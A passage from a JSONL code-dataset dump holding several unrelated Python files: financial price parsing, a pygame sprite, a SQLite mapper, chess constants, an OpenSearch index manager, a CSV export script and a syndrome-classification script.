bs(self.requesturl(\"\").decode('utf-8'),\"lxml\")\n\n\tdef read(self, path):\n\t\ttry:\n\t\t\tf=open(path, \"r\")\n\t\texcept IOError:\n\t\t\tprint(\"Could not read file:\", path)\n\t\t\tsys.exit()\n\t\twith f:\n\t\t\tself.__soup=bs(f.read(), \"lxml\")\n\t\t\tself.rowsep=\"\\n\"\n\n\tdef parse(self):\n\n\t\tprint(\"Parsing prices ....\")\n\t\tself.delim=self.settings[\"delim\"]\n\t\tscheme_type=\"\"\n\t\tscheme_category=\"\"\n\t\tscheme_house=\"\"\n\t\tscheme_type_list=[\"Open\", \"Close\", \"Interval\"]\n\t\tdtable=[]\n\t\tif self.__soup.text:\n\n\t\t\tallLines=self.__soup.text.split(self.rowsep)\n\n\t\t\t# set column from the source data\n\t\t\tif self.delim in allLines[0]:\n\t\t\t\tself.columns=[column.strip()\n\t\t\t\t\t\t\t\tfor column in allLines[0].split(self.delim)]\n\n\t\t\t# print(self.columns)\n\n\t\t\t# parse data lines one by one\n\t\t\tfor line in allLines[1:]:\n\t\t\t\tif line.strip():\t\t\t\t\t\t\t\t# check if line is empty\n\t\t\t\t\tif self.delim in line:\t\t\t\t\t\t\t# checking the line is data row\n\t\t\t\t\t\t# Split data line into a list by delim\n\t\t\t\t\t\trow=line.split(self.delim)\n\t\t\t\t\t\trow.append(scheme_type)\n\t\t\t\t\t\trow.append(scheme_category)\n\t\t\t\t\t\trow.append(scheme_house)\n\t\t\t\t\t\tif len(row) == 10:\n\t\t\t\t\t\t\tprint(line)\n\t\t\t\t\t\tdtable.append(row)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# checking the line is Scheme Type and Scheme category\n\t\t\t\t\t\tif '(' in line and ')' in line and any(stype in line for stype in scheme_type_list):\n\t\t\t\t\t\t\tscheme_type=line.split('(', 1)[0].strip()\n\t\t\t\t\t\t\tscheme_category=line.split(\n\t\t\t\t\t\t\t\t'(', 1)[1].split(')')[0].strip()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tscheme_house=line\n\n\t\t\t# Extend columns for 3 extra columns\n\t\t\tself.columns.extend(self.settings[\"extend\"])\n\n\t\t\t# print(dtable)\n\t\t\t# print(self.columns)\n\t\t\t\n\t\t\t# Make dataframe on parsing mode\n\t\t\tself.main_df=pd.DataFrame(dtable, columns=self.columns)\n\t\t\tdup_rows = []\n\t\t\tself.main_df = self.main_df.rename(columns={\"ISIN Div Payout/ISIN Growth\": \"ISIN\"})\n\t\t\tfor index,row in self.main_df.iterrows():\n\t\t\t\tif row['ISIN'].strip() == '-' or row['ISIN'].strip() == \"\" :\n\t\t\t\t\tif row['ISIN Div Reinvestment'].strip():\n\t\t\t\t\t\trow['ISIN'] = row['ISIN Div Reinvestment']\n\t\t\t\t\telse:\n\t\t\t\t\t\trow['ISIN'] = row['Scheme Code']\n\t\t\t\telif len(row['ISIN Div Reinvestment']) == 12:\n\t\t\t\t\tdupRow = row.copy()\n\t\t\t\t\tdupRow['ISIN'] = dupRow['ISIN Div Reinvestment']\n\t\t\t\t\tdup_rows.append(dupRow.values)\n\t\t\t\n\t\t\tself.main_df = self.main_df.append(pd.DataFrame(dup_rows, columns=self.main_df.columns))\t\t\t\t\t\t\t\t\t\n\t\t\tself.main_df['type'] = \"mf\"\n\t\t\tdel dup_rows\n\t\t\n\tdef cpyPri(self,fdate,tdate):\n\t\tself.copy_price(fdate,tdate)\n\t\t\n\tdef DLPrice(self):\n\t\ttry:\n\t\t\tself.suck()\n\t\t\tself.parse()\n\t\t\tself.save(isCopyRaw=True)\n\t\texcept:\n\t\t\tself.misspri.append(\"AMFI fail to download {}\".format(self.url))\n\t\t\t# print(\"Fail to download\")\n\nclass PpNse(PpSecurity):\n\n\tdef __init__(self, edate=\"\"):\n\t\tself.exchange=\"nse\"\n\t\t\n\t\tif not edate:\n\t\t\tself.settings=pp_settings()[self.exchange]\n\t\telse:\n\t\t\tsuper().__init__(edate)\n\n\tdef suck(self):\n\t\tself.main_df=pd.read_csv(io.StringIO(self.request_url(\n\t\t\tself.url).decode('utf-8')), delimiter=' *, *', engine='python', keep_default_na=False, dtype=str)\n\t\t# self.main_df = pd.read_csv('/home/bharath/Downloads/out.csv', sep=\",\")\n\t\t\n\tdef suck_EQ_Hist(self, edate, fdate):\n\t\tprint(\"Download Historical Prices For Equities\")\n\t\tif not edate and not fdate:\n\t\t\tprint(\"There mush be a From and To Dates for downloading price for the range.\")\n\t\t\tsys.exit(0)\n\t\t\t\n\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\tfdate = dt.strptime(fdate, '%m%d%Y')\n\t\t\n\t\t# Downloading a range of Historical Price\n\t\tfrom nsepy.history import get_price_list\n\t\tinc = timedelta(1)\n\t\t\n\t\tdframe = pd.DataFrame();\n\t\t\t\t\n\t\twhile edate <= fdate:\n\t\t\ttry:\n\t\t\t\tdframe = get_price_list(dt=edate)\n\t\t\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\texcept:\n\t\t\t\tprint (\"Cannot be download Price file for the date {}.\".format(edate))\n\t\t\t\tself.misspri.append(\"NSE EQ FRange {}\".format(edate))\n\t\t\tedate += inc\n\t\t\n\t\teqSett = self.settings[\"saveBy\"][\"EQ\"]\n\t\tself.settings[\"saveby\"] = eqSett[\"saveby\"];\n\t\tself.settings[\"ppformat\"] = eqSett[\"ppformat\"];\n\t\t# self.main_df=self.main_df.rename(columns = {'CLOSE':'CLOSE_PRICE'})\n\t\t\n\tdef suck_B(self,edate,fdate=\"\"):\n\t\tprint(\"Download Historical Prices For Bonds\")\n\t\tif not edate and not fdate:\n\t\t\tprint(\"There mush be an Date for which you wish to downloading price.\")\n\t\t\tsys.exit(0)\n\t\t\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'NB'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\t\tif len(self.main_df.columns) > 2 :\n\t\t\tself.main_df.insert(2,\"SERIES\",\"BO\")\n\t\telse:\n\t\t\tprint(\"File Not Found\")\n\t\t\tself.main_df = pd.DataFrame();\n\t\t\t\t\n\t\tbondSett = self.settings[\"saveBy\"][\"BO\"]\n\t\tself.settings[\"saveby\"] = bondSett[\"saveby\"];\n\t\tself.settings[\"ppformat\"] = bondSett[\"ppformat\"];\n\t\t# self.settings['path'] = bondSett['path']\t\t\n\t\t\n\tdef suck_I(self,edate,fdate=\"\"):\n\t\tprint(\"Download Historical Prices For Future and Option\")\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'NF'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\t\tif not self.main_df.empty:\n\t\t\t# self.main_df['SYMB'] = self.main_df.apply(lambda row: row.SYMBOL + dt.strptime(row.EXPIRY_DT,\"%d-%b-%Y\").strftime(\"%m%d%Y\") + str(row.STRIKE_PR), axis = 1)\n\t\t\tself.main_df['EXPIRY_DT'] = self.main_df.apply(lambda row: dt.strptime(row.EXPIRY_DT,\"%d-%b-%Y\").strftime(\"%m%d%Y\") , axis = 1)\n\t\t\n\t\toptSett = self.settings[\"saveBy\"][\"OP\"]\n\t\tself.settings[\"saveby\"] = optSett[\"saveby\"];\n\t\tself.settings[\"ppformat\"] = optSett[\"ppformat\"];\n\t\t\n\tdef update_holiday(self):\n\n\t\t# read holiday list from central repo\n\t\tholidaydf=pd.read_csv(self.settings[\"holiday-path\"], sep=\"\\t\")\n\t\tholidaydf['Date']=pd.to_datetime(\n\t\t\tholidaydf['Date'], format='%d-%b-%Y').dt.strftime('%m%d%Y')\n\n\t\t# read PP holiday schedule information to get exchange number\n\t\tholsc_obj=PpTable(\"holsched.inf\")\n\t\tholsc_df=holsc_obj.getdata()\n\t\tholsc_df.name=holsc_df.name.str.lower()\n\t\texchange_no=holsc_df.loc[holsc_df['name']\n\t\t\t\t\t\t\t\t == self.exchange].hshed.iloc[0]\n\n\t\t# load Prism Holiday Information\n\t\thol_obj=PpTable(\"holidayb.inf\")\n\t\thol_df=hol_obj.getdata()\n\n\t\thol_dict={}\n\t\tfor item in hol_obj.dfidx.fcode.values:\n\t\t\tif item == \"hdate\":\n\t\t\t\thol_dict[item]=holidaydf.Date\n\t\t\tif item == \"htype\":\n\t\t\t\thol_dict[item]=[1 for i in range(len(holidaydf))]\n\t\t\tif item == \"hshed\":\n\t\t\t\thol_dict[item]=[exchange_no for i in range(len(holidaydf))]\n\n\t\t# create new holiday dataframe from central data\n\t\tnew_holiday=pd.DataFrame(hol_dict)\n\n\t\thol_df=pd.concat(\n\t\t\t[hol_df.astype(str), new_holiday.astype(str)], ignore_index=True)\n\n\t\thol_df=hol_df.drop_duplicates()\n\n\t\thol_df.hdate=pd.to_datetime(hol_df.hdate, format=\"%m%d%Y\")\n\t\thol_df=hol_df.sort_values(\"hdate\")\n\t\thol_df.hdate=hol_df.hdate.dt.strftime(\"%m%d%Y\")\n\n\t\thol_obj.savedata(hol_df)\n\t\tprint(\"data has been updated into {}...\".format(hol_obj.tablePath))\n\t\t# return hol_df\n\n\tdef parse(self):\n\n\t\tprint(\"No parsing...\")\n\t\t\n\tdef cpyPri(self,fdate,tdate):\n\t\tself.copy_price(fdate,tdate)\n\t\tself.copy_price(fdate,tdate,\"bond/\")\n\t\tself.copy_price(fdate,tdate,\"option/\")\n","sub_path":"libs/ppsecurity.py","file_name":"ppsecurity.py","file_ext":"py","file_size_in_byte":21888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224803458","text":"import pygame\n\nfrom src.setting import *\n\n\nclass Monster(object):\n\n def __init__(self, screen):\n self.blood = 100\n self.screen = screen\n\n self.image = pygame.image.load('D:/ship.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n # 将每艘新飞船放在屏幕底部中央\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n self.move_right = False\n self.move_left = False\n self.move_up = False\n self.move_down = False\n self.unit_distance = monster_speed\n\n # 在飞船的属性 center 中存储小数值\n self.center = float(self.rect.centerx)\n\n def move(self):\n self.rect.centery += self.unit_distance\n","sub_path":"src/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629582488","text":"from tries.mappers.i_mapper import *\n# Internal\nfrom tries.domain.pipe import Pipe\n# Python\nimport sqlite3\n\n\n@mapperFor(Pipe)\nclass PipeMapper(IMapper):\n\n def find(self, primaryKey):\n\n with sqlite3.connect('example.db') as databaseSession:\n\n dataSets = databaseSession.execute(\"SELECT * FROM Pipes WHERE Id = ?\", (primaryKey, ))\n return self.handleDataSets(dataSets)\n \n\n def handleDataSets(self, dataSets):\n\n results = []\n\n for dataSet in dataSets:\n iterator = iter(dataSet)\n\n session = Pipe()\n\n session.primaryKey = next(iterator)\n session.start = next(iterator)\n session.stop = next(iterator)\n\n session.pipes = PipeMapper.find()\n\n results.append(session)\n\n return results","sub_path":"tries/mappers/pipe_mapper.py","file_name":"pipe_mapper.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535301634","text":"class Pieces:\n XX = 7\n OO = 0\n WP = 1\n WR = 2\n WN = 3\n WB = 4\n WQ = 5\n WK = 6\n BP = -1\n BR = -2\n BN = -3\n BB = -4\n BQ = -5\n BK = -6\n\n\nqueen_rook_col = 2\nking_start_col = 6\nking_rook_col = 9\nking_start_pos = {False: (2, king_start_col), True: (9, king_start_col)}\nking_castled_kingside_pos = {False: (2, 8), True: (9, 8)}\nking_castled_queenside_pos = {False: (2, 4), True: (9, 4)}\nrook_start_pos = {False: ((2, queen_rook_col), (2, king_rook_col)), True: ((9, queen_rook_col), (9, king_rook_col))}\n\npiece_to_descriptor = {'WP': (True, 'pawn'), 'WR': (True, 'rook'), 'WN': (True, 'knight'), 'WB': (True, 'bishop'), 'WQ': (True, 'queen'), 'WK': (True, 'king'), 'BP': (False, 'pawn'),\n 'BR': (False, 'rook'), 'BN': (False, 'knight'), 'BB': (False, 'bishop'), 'BQ': (False, 'queen'), 'BK': (False, 'king')}\n\nvalue_to_piece = {0: '0 ', 1: 'WP', 2: 'WR', 3: 'WN', 4: 'WB', 5: 'WQ', 6: 'WK', -1: 'BP', -2: 'BR', -3: 'BN', -4: 'BB', -5: 'BQ', -6: 'BK'}\n\npromotion_color_to_value = {('k', True): 6, ('q', True): 5, ('r', True): 2, ('b', True): 4, ('n', True): 3, ('p', True): 1, ('k', False): -6, ('q', False): -5, ('r', False): -2, ('b', False): -4,\n ('n', False): -3, ('p', False): -1}\n\nvalue_to_piece_short = {0: 'wtf', 1: 'p', 2: 'r', 3: 'n', 4: 'b', 5: 'q', 6: 'k', -1: 'p', -2: 'r', -3: 'n', -4: 'b', -5: 'q', -6: 'k'}\n\nvalue_to_piece_img = {-1: '♟', -2: '♜', -3: '♞', -4: '♝', -5: '♛', -6: '♚', 1: '♙', 2: '♖', 3: '♘', 4: '♗', 5: '♕', 6: '♔', 0: '.'}\n\npossible_promotions = {True: (2, 3, 4, 5), False: (-2, -3, -4, -5)}\n\nblack_walkable_squares = {1, 2, 3, 4, 5, 6, 0}\nwhite_piece_values = {1, 2, 3, 4, 5, 6}\nwhite_walkable_squares = {-1, -2, -3, -4, -5, -6, 0}\nblack_piece_values = {-1, -2, -3, -4, -5, -6}\n\nis_enemy = {True: lambda piece_int: piece_int in black_piece_values, False: lambda piece_int: piece_int in white_piece_values}\n\nrook_directions = ((0, 1), (1, 0), (0, -1), (-1, 0))\nbishop_directions = ((1, 1), (1, -1), (-1, -1), (-1, 1))\nqueen_directions = ((0, 1), (1, 0), (0, -1), (-1, 0), (1, 1), (1, -1), (-1, -1), (-1, 1))\n\n\ndef get_knight_squares(row, col):\n return ((row - 1, col + 2), (row + 1, col + 2), (row + 2, col + 1), (row + 2, col - 1), (row + 1, col - 2), (row - 1, col - 2), (row - 2, col - 1), (row - 2, col + 1))\n\n\ndef get_king_squares(row, col):\n return ((row + 1, col - 1), (row + 1, col), (row + 1, col + 1), (row, col - 1), (row, col + 1), (row - 1, col - 1), (row - 1, col), (row - 1, col + 1))\n\n\ndef get_attacking_enemy_pawn_squares(row, col, is_white):\n return [(row - 1, col - 1), (row - 1, col + 1)] if is_white else [(row + 1, col - 1), (row + 1, col + 1)]\n","sub_path":"Pieces.py","file_name":"Pieces.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"456216595","text":"# Copyright The IETF Trust 2022, All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__author__ = 'Slavomir Mazur'\n__copyright__ = 'Copyright The IETF Trust 2022, All Rights Reserved'\n__license__ = 'Apache License, Version 2.0'\n__email__ = 'slavomir.mazur@pantheon.tech'\n\nimport json\nimport os\nimport typing as t\nfrom configparser import ConfigParser\n\nfrom opensearchpy import OpenSearch\nfrom opensearchpy.exceptions import AuthorizationException, NotFoundError, RequestError\nfrom opensearchpy.helpers import parallel_bulk\n\nimport utility.log as log\nfrom opensearch_indexing.models.keywords_names import KeywordsNames\nfrom opensearch_indexing.models.opensearch_indices import OpenSearchIndices\nfrom utility.create_config import create_config\n\n\nclass OpenSearchManager:\n def __init__(self, opensearch: t.Optional[OpenSearch] = None):\n config = create_config()\n self.threads = int(config.get('General-Section', 'threads'))\n log_directory = config.get('Directory-Section', 'logs')\n self.opensearch_repo_name = config.get('General-Section', 'opensearch-repo-name')\n self.opensearch_request_timeout = int(config.get('General-Section', 'opensearch-request-timeout', fallback=60))\n self._setup_opensearch(config, opensearch)\n log_file_path = os.path.join(log_directory, 'jobs', 'opensearch-manager.log')\n self.logger = log.get_logger('opensearch-manager', log_file_path)\n\n def _setup_opensearch(self, config: ConfigParser, opensearch: t.Optional[OpenSearch] = None):\n if opensearch:\n self.opensearch = opensearch\n return\n opensearch_aws = config.get('DB-Section', 'opensearch-aws')\n opensearch_credentials = config.get('Secrets-Section', 'opensearch-secret').strip('\"').split(' ')\n opensearch_host_config = {\n 'host': config.get('DB-Section', 'opensearch-host', fallback='localhost'),\n 'port': config.get('DB-Section', 'opensearch-port', fallback='9200'),\n }\n if opensearch_aws == 'True':\n self.opensearch = OpenSearch(\n hosts=[opensearch_host_config],\n http_auth=(opensearch_credentials[0], opensearch_credentials[1]),\n scheme='https',\n )\n return\n self.opensearch = OpenSearch(hosts=[opensearch_host_config])\n\n def ping(self) -> bool:\n return self.opensearch.ping()\n\n def cluster_health(self) -> dict:\n \"\"\"Returns a brief representation of the cluster health\"\"\"\n return self.opensearch.cluster.health()\n\n def create_index(self, index: OpenSearchIndices):\n \"\"\"\n Create OpenSearch index with given name.\n\n Argument:\n :param index (OpenSearchIndices) Index to be created\n \"\"\"\n index_name = index.value\n index_json_name = f'initialize_{index_name}_index.json'\n index_json_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/', index_json_name)\n with open(index_json_path, encoding='utf-8') as reader:\n index_config = json.load(reader)\n\n create_result = None\n try:\n create_result = self.opensearch.indices.create(index=index_name, body=index_config, ignore=400)\n except AuthorizationException:\n # https://discuss.elastic.co/t/forbidden-12-index-read-only-allow-delete-api/110282/4\n self.logger.exception('Problem with index creation')\n read_only_query = {'index': {'blocks': {'read_only_allow_delete': 'false'}}}\n self.opensearch.indices.put_settings(index=index_name, body=read_only_query)\n create_result = self.opensearch.indices.create(index=index_name, body=index_config, ignore=400)\n return create_result\n\n def index_exists(self, index: OpenSearchIndices) -> bool:\n \"\"\"\n Check if the index already exists.\n\n Argument:\n :param index (OpenSearchIndices) Index to be checked\n \"\"\"\n name = index.value\n return self.opensearch.indices.exists(name) or self.opensearch.indices.exists_alias(name)\n\n def get_indices(self) -> list:\n \"\"\"Returns a list of existing indices.\"\"\"\n return list(self.opensearch.indices.get_alias().keys())\n\n def put_index_mapping(self, index: OpenSearchIndices, body: dict) -> dict:\n \"\"\"\n Update mapping for provided index.\n\n Arguments:\n :param index (OpenSearchIndices) Index whose mapping to update\n :param body (dict) Mapping definition\n \"\"\"\n return self.opensearch.indices.put_mapping(index=index.value, body=body, ignore=403)\n\n def get_index_mapping(self, index: OpenSearchIndices) -> dict:\n \"\"\"\n Get mapping for provided index.\n\n Argument:\n :param index (OpenSearchIndices) Index whose mapping to get\n \"\"\"\n mapping = {}\n try:\n mapping = self.opensearch.indices.get_mapping(index=index.value)\n except NotFoundError:\n self.logger.exception('Index not found')\n return mapping\n\n def get_documents_count(self, index: OpenSearchIndices) -> int:\n \"\"\"\n Get number of documents stored in provided index.\n\n Argument:\n :param index (OpenSearchIndices) Index in which to search\n \"\"\"\n count = 0\n try:\n count = self.opensearch.count(index=index.value)['count']\n except NotFoundError:\n self.logger.exception('Index not found')\n return count\n\n def autocomplete(self, index: OpenSearchIndices, keyword: KeywordsNames, searched_term: str) -> list:\n \"\"\"\n Get list of the modules which will be returned as autocomplete after entering the 'searched_term' by the user.\n\n Arguments:\n :param index (OpenSearchIndices) Index in which to search\n :param keyword (KeywordsNames)\n :param searched_term (str) String entered by the user\n \"\"\"\n autocomplete_json_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/completion.json')\n with open(autocomplete_json_path, encoding='utf-8') as reader:\n autocomplete_query = json.load(reader)\n\n autocomplete_query['query']['bool']['must'][0]['term'] = {keyword.value: searched_term.lower()}\n autocomplete_query['aggs']['groupby_module']['terms']['field'] = f'{keyword.value}.keyword'\n rows = self.opensearch.search(index=index.value, body=autocomplete_query)\n hits = rows['aggregations']['groupby_module']['buckets']\n\n result = [hit['key'] for hit in hits]\n\n return result\n\n def delete_from_index(self, index: OpenSearchIndices, module: dict) -> dict:\n \"\"\"\n Delete module from the index.\n\n Arguments:\n :param index (OpenSearchIndices) Target index from which to delete module\n :param module (dict) Document to delete\n \"\"\"\n self.logger.info(f'Deleting module: \"{module}\" from index: \"{index}\"')\n delete_module_query = self._get_name_revision_query(index, module)\n return self.opensearch.delete_by_query(index=index.value, body=delete_module_query, conflicts='proceed')\n\n def delete_from_indices(self, module: dict):\n for index in OpenSearchIndices:\n self.delete_from_index(index, module)\n\n def index_module(self, index: OpenSearchIndices, document: dict) -> dict:\n \"\"\"\n Creates or updates a 'document' in a selected index.\n\n Arguments:\n :param index (OpenSearchIndices) Target index to be indexed\n :param document (dict) Document to index\n \"\"\"\n # TODO: Remove this IF after reindexing and unification of both indices\n if index in [OpenSearchIndices.MODULES, OpenSearchIndices.YINDEX]:\n try:\n document['module'] = document.pop('name')\n except KeyError:\n pass\n\n return self.opensearch.index(index=index.value, body=document, request_timeout=self.opensearch_request_timeout)\n\n def bulk_modules(self, index: OpenSearchIndices, chunk):\n for success, info in parallel_bulk(\n client=self.opensearch,\n actions=chunk,\n index=index.value,\n thread_count=self.threads,\n request_timeout=self.opensearch_request_timeout,\n ):\n if not success:\n self.logger.error(f'OpenSearch document failed with info: {info}')\n\n def match_all(self, index: OpenSearchIndices) -> dict:\n \"\"\"\n Return the dictionary of all modules that are in the index.\n\n Argument:\n :param index (OpenSearchIndices) Index in which to search\n \"\"\"\n\n def _store_hits(hits: list, all_results: dict):\n for hit in hits:\n name = ''\n revision = hit['_source']['revision']\n organization = hit['_source']['organization']\n try:\n name = hit['_source']['name']\n except KeyError:\n name = hit['_source']['module']\n new_path = f'/var/yang/all_modules/{name}@{revision}.yang'\n if not os.path.exists(new_path):\n self.logger.error(f'{new_path} does not exists')\n\n key = f'{name}@{revision}/{organization}'\n if key not in all_results:\n all_results[key] = hit['_source']\n\n all_results = {}\n match_all_query = {'query': {'match_all': {}}}\n total_index_docs = 0\n opensearch_result = self.opensearch.search(index=index.value, body=match_all_query, scroll=u'1m', size=250)\n scroll_id = opensearch_result.get('_scroll_id')\n hits = opensearch_result['hits']['hits']\n _store_hits(hits, all_results)\n total_index_docs += len(hits)\n\n while opensearch_result['hits']['hits']:\n opensearch_result = self.scroll(scroll_id)\n\n scroll_id = opensearch_result.get('_scroll_id')\n hits = opensearch_result['hits']['hits']\n _store_hits(hits, all_results)\n total_index_docs += len(hits)\n\n self.clear_scroll(scroll_id)\n return all_results\n\n def get_module_by_name_revision(self, index: OpenSearchIndices, module: dict) -> list:\n get_module_query = self._get_name_revision_query(index, module)\n\n opensearch_result = self.opensearch.search(index=index.value, body=get_module_query, size=1000)\n\n return opensearch_result['hits']['hits']\n\n def get_sorted_module_revisions(self, index: OpenSearchIndices, name: str):\n query_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/sorted_name_rev_query.json')\n with open(query_path, encoding='utf-8') as reader:\n sorted_name_rev_query = json.load(reader)\n\n # TODO: Remove this IF after reindexing and unification of both indices\n if index in [OpenSearchIndices.MODULES, OpenSearchIndices.YINDEX]:\n del sorted_name_rev_query['query']['bool']['must'][0]['match_phrase']['name.keyword']\n sorted_name_rev_query['query']['bool']['must'][0]['match_phrase'] = {'module.keyword': {'query': name}}\n else:\n sorted_name_rev_query['query']['bool']['must'][0]['match_phrase']['name.keyword']['query'] = name\n\n try:\n es_result = self.opensearch.search(index=index.value, body=sorted_name_rev_query)\n except RequestError:\n return []\n\n return es_result['hits']['hits']\n\n def get_node(self, module: dict) -> dict:\n query_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/show_node.json')\n with open(query_path, encoding='utf-8') as reader:\n show_node_query = json.load(reader)\n\n show_node_query['query']['bool']['must'][0]['match_phrase']['module.keyword']['query'] = module['name']\n show_node_query['query']['bool']['must'][1]['match_phrase']['path']['query'] = module['path']\n show_node_query['query']['bool']['must'][2]['match_phrase']['revision']['query'] = module['revision']\n hits = self.opensearch.search(index=OpenSearchIndices.YINDEX.value, body=show_node_query)\n\n return hits\n\n def generic_search(\n self,\n index: t.Union[OpenSearchIndices, str],\n query: dict,\n response_size: t.Optional[int] = 0,\n use_scroll: bool = False,\n ):\n index = index if isinstance(index, str) else index.value\n if use_scroll:\n return self.opensearch.search(\n index=index,\n body=query,\n request_timeout=self.opensearch_request_timeout,\n scroll=u'10m',\n size=response_size,\n )\n return self.opensearch.search(\n index=index,\n body=query,\n request_timeout=self.opensearch_request_timeout,\n size=response_size,\n )\n\n def clear_scroll(self, scroll_id: str):\n return self.opensearch.clear_scroll(scroll_id=scroll_id, ignore=(404,))\n\n def scroll(self, scroll_id: str):\n return self.opensearch.scroll(\n scroll_id=scroll_id,\n scroll=u'10m',\n request_timeout=self.opensearch_request_timeout,\n )\n\n def document_exists(self, index: OpenSearchIndices, module: dict) -> bool:\n \"\"\"\n Check whether 'module' already exists in index - if count is greater than 0.\n\n Arguments:\n :param index (OpenSearchIndices) Index in which to search\n :param module (dict) Document to search\n \"\"\"\n if index == OpenSearchIndices.DRAFTS:\n get_query = self._get_draft_query(index, module)\n else:\n get_query = self._get_name_revision_query(index, module)\n\n try:\n es_count = self.opensearch.count(index=index.value, body=get_query)\n except RequestError:\n return False\n\n return es_count['count'] > 0\n\n def _get_name_revision_query(self, index: OpenSearchIndices, module: dict) -> dict:\n module_search_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/module_search.json')\n with open(module_search_path, encoding='utf-8') as reader:\n name_revision_query = json.load(reader)\n\n # TODO: Remove this IF after reindexing and unification of both indices\n if index in [OpenSearchIndices.MODULES, OpenSearchIndices.YINDEX]:\n del name_revision_query['query']['bool']['must'][0]['match_phrase']['name.keyword']\n name_revision_query['query']['bool']['must'][0]['match_phrase'] = {\n 'module.keyword': {'query': module['name']},\n }\n else:\n name_revision_query['query']['bool']['must'][0]['match_phrase']['name.keyword']['query'] = module['name']\n name_revision_query['query']['bool']['must'][1]['match_phrase']['revision']['query'] = module['revision']\n\n return name_revision_query\n\n def _get_draft_query(self, index: OpenSearchIndices, draft: dict) -> dict:\n draft_search_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/draft_search.json')\n with open(draft_search_path, encoding='utf-8') as reader:\n draft_query = json.load(reader)\n\n draft_query['query']['bool']['must'][0]['match_phrase']['draft']['query'] = draft['draft']\n return draft_query\n","sub_path":"opensearch_indexing/opensearch_manager.py","file_name":"opensearch_manager.py","file_ext":"py","file_size_in_byte":16026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"416105465","text":"import sys\r\nimport csv\r\nfrom main import *\r\n\r\ndef make_excel(out_file): \r\n with open(out_file, mode='wt', newline='') as out_file:\r\n w = csv.writer(out_file) #,delimiter=',')\r\n for x in children_list:\r\n col1 = x.first_name\r\n col2 = x.last_name\r\n col3 = x.age()\r\n col4 = x.gender\r\n col5 = x.address\r\n col6 = x.trustee_list[0].first_name\r\n col7 = x.trustee_list[0].last_name\r\n col8 = x.trustee_list[0].phone\r\n line = [col1, col2, col3, col4, col5, col6, col7, col8]\r\n w.writerow(line)\r\n\r\nif __name__ == \"__main__\":\r\n out_file = sys.argv[1]\r\n result = make_excel(out_file)","sub_path":"original_csv.py","file_name":"original_csv.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8994883","text":"import networkx as nx\nimport pandas as pd\nimport numpy as np\nimport random\nfrom tqdm import tqdm\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.neural_network import MLPClassifier\n\n\nrandom.seed(2)\n\nkg = pd.read_csv(\"./data/syndrome9.csv\")\nG = nx.from_pandas_edgelist(kg, 'syndrome', 'symptom', edge_attr=None, create_using=nx.Graph())\n\npatient1 = pd.read_excel('./data/crf1_4_10.xlsx')\npatient2 = pd.read_excel('./data/crf2_4_10.xlsx')\n\nname = list(patient1.columns)[8: ]\nprint('患者症状名称:', name)\n\nkg_name = list(set(list(kg['syndrome']) + list(kg['symptom'])))\nprint('知识图谱节点名称:', kg_name)\n\n# 空值处理\ndef padnan(metrix):\n for i in range(metrix.shape[0]):\n for j in range(metrix.shape[1]):\n if np.isnan(metrix[i, j]):\n metrix[i, j] = 0\n return metrix\n\npatient1 = padnan(np.array(patient1))\npatient2 = padnan(np.array(patient2))\n\npatient = np.concatenate((patient1, patient2), axis = 0)\nprint('患者特征矩阵:', patient.shape)\n\npatient = list(patient)\n# randnum = random.randint(0, 100)\nrandnum = 2 # 2,4,7,11\nrandom.seed(randnum)\nrandom.shuffle(patient)\npatient = np.array(patient)\n\n# 划分训练集测试集\ntrain_patient = patient[0: int(len(patient)*0.6)]\nval_patient = patient[int(len(patient)*0.6): int(len(patient)*0.8)]\ntest_patient = patient[int(len(patient)*0.8): ]\n\n# 负类样本增强\ntrain_patient_neg = []\nfor i in range(len(train_patient[:, 0:4])):\n if list(train_patient[:, 0:4][i]).index(max(train_patient[:, 0:4][i])) != 1:\n train_patient_neg.append(train_patient[i])\n\ntrain_patient_neg = np.array(1 * train_patient_neg) # 增强1次\ntrain_patient = np.concatenate((train_patient, train_patient_neg), axis = 0)\n\nprint('训练集样本数:', 